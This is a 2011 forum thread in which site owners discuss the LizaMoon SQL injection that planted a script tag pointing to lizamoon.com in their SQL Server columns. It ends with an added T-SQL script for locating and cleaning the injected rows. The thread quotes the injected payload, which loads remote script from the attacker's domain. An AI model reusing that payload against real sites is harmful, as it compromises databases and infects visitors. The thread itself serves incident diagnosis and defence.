Last post Apr 07, 2011 12:24 PM by timtatum
Mar 27, 2011 10:02 AM
A string like "</title><script src=http://lizamoon.com/ur.php></script>" was inserted into my database, even into the username field in the aspnet_users table. So now I can't log in to my website if I use ASP.NET security. If anyone knows about this problem, please tell me what is happening with my database or my website. And how can I fix it? Thanks all!
Mar 27, 2011 06:32 PM
Does your signup page have validaterequest="false" at the top of the page?
If you have disabled request validation (for example, to allow certain rich text boxes to accept HTML input on the page), then you might have opened up a security hole which has allowed somebody to sign up with spammy names?
One possible way to prevent this in future would be to put a regular expression validator on your username textbox on the signup page.
You will need to connect to your database and manually clean out the rogue records as well, so that you can log in.
I would also recommend installing ELMAH, which will log any errors occurring on the site and could give you a heads-up about people attacking your site:
Mar 28, 2011 08:34 AM
Same problem. Did you find a solution?
Mar 28, 2011 08:44 AM
Hi, I don't think it's a signup problem. All database usernames are corrupted, even old ones.
Mar 28, 2011 09:26 AM
Mar 28, 2011 10:08 AM
This appeared on my ASP site on Friday, and I have removed all instances of it that I can find. However, I still want to know why this has happened, as I have another two ASP sites and one ASP.NET site.
The common thing between all my sites is that they use a SQL Server database.
I have also found the whois details of lizamoon.com and it comes up with rubbish, view it here:
Mar 28, 2011 11:38 AM
Hit one of my sites as well. Written in Cold Fusion but running a SQL Server database.
Hit multiple tables and various columns in the database.
Mar 28, 2011 12:02 PM
After a bit more investigation and clearing out my database, it has only been added to fields that are either 'text' or 'nvarchar' data types.
If you do a Google search for part of the script URL, it shows up a lot of sites that have been infected. I have also noticed that one of the sites is displaying 'Alert: This Site has been hit with the Liza Moon SQL Injection Attack!'
Has anyone found out how and why this has happened, and any way of stopping it happening again?
Mar 28, 2011 12:40 PM
We've been attacked too - exactly the same symptoms - anyone figured out how they got in yet???
Mar 28, 2011 01:14 PM
One of our SQL 2005 databases was attacked last Friday. Only some ntext or varchar fields have been modified. We use tiny_mce for HTML insertion by ASP.NET pages into the SQL Server db.
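One way to locate the injected tag in every character column, since the posts above report it in text, ntext, varchar and nvarchar fields across multiple tables (an added T-SQL example, not code from any poster in this thread). It assumes SQL Server 2005 or later and the exact string quoted in the first post; the variable and cursor names are illustrative.

```sql
-- Added example. Read-only: counts affected rows per column and PRINTs a
-- candidate UPDATE for review. It does not modify any data itself.
SET NOCOUNT ON;

-- Marker copied from the first post. It contains no %, _ or [ characters and
-- no single quotes, so it can be used as-is in a LIKE pattern and a literal.
DECLARE @marker nvarchar(200);
SET @marker = N'</title><script src=http://lizamoon.com/ur.php></script>';

DECLARE @schema sysname, @table sysname, @column sysname;
DECLARE @sql nvarchar(max), @hits int;

-- Every character-typed column of every base table (views are skipped).
DECLARE col_cursor CURSOR LOCAL FAST_FORWARD FOR
    SELECT c.TABLE_SCHEMA, c.TABLE_NAME, c.COLUMN_NAME
    FROM INFORMATION_SCHEMA.COLUMNS AS c
    JOIN INFORMATION_SCHEMA.TABLES AS t
      ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
    WHERE t.TABLE_TYPE = 'BASE TABLE'
      AND c.DATA_TYPE IN ('char', 'varchar', 'nchar', 'nvarchar', 'text', 'ntext');

OPEN col_cursor;
FETCH NEXT FROM col_cursor INTO @schema, @table, @column;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- Identifiers are quoted with QUOTENAME; the marker is passed as a parameter.
    -- The CAST lets the same predicate work on legacy text/ntext columns.
    SET @sql = N'SELECT @n = COUNT(*) FROM ' + QUOTENAME(@schema) + N'.' + QUOTENAME(@table)
             + N' WHERE CAST(' + QUOTENAME(@column) + N' AS nvarchar(max)) LIKE N''%'' + @m + N''%''';
    EXEC sp_executesql @sql, N'@m nvarchar(200), @n int OUTPUT', @m = @marker, @n = @hits OUTPUT;

    IF @hits > 0
        PRINT CAST(@hits AS varchar(12)) + ' row(s) -- UPDATE '
            + QUOTENAME(@schema) + '.' + QUOTENAME(@table)
            + ' SET ' + QUOTENAME(@column) + ' = REPLACE(CAST(' + QUOTENAME(@column)
            + ' AS nvarchar(max)), N''' + @marker + ''', N'''')'
            + ' WHERE CAST(' + QUOTENAME(@column) + ' AS nvarchar(max)) LIKE N''%'
            + @marker + '%'';';

    FETCH NEXT FROM col_cursor INTO @schema, @table, @column;
END
CLOSE col_cursor;
DEALLOCATE col_cursor;
```

Take a backup before running any of the printed UPDATE statements, and check each one against the affected rows first, since the script only reports matches and leaves the cleanup decision to you.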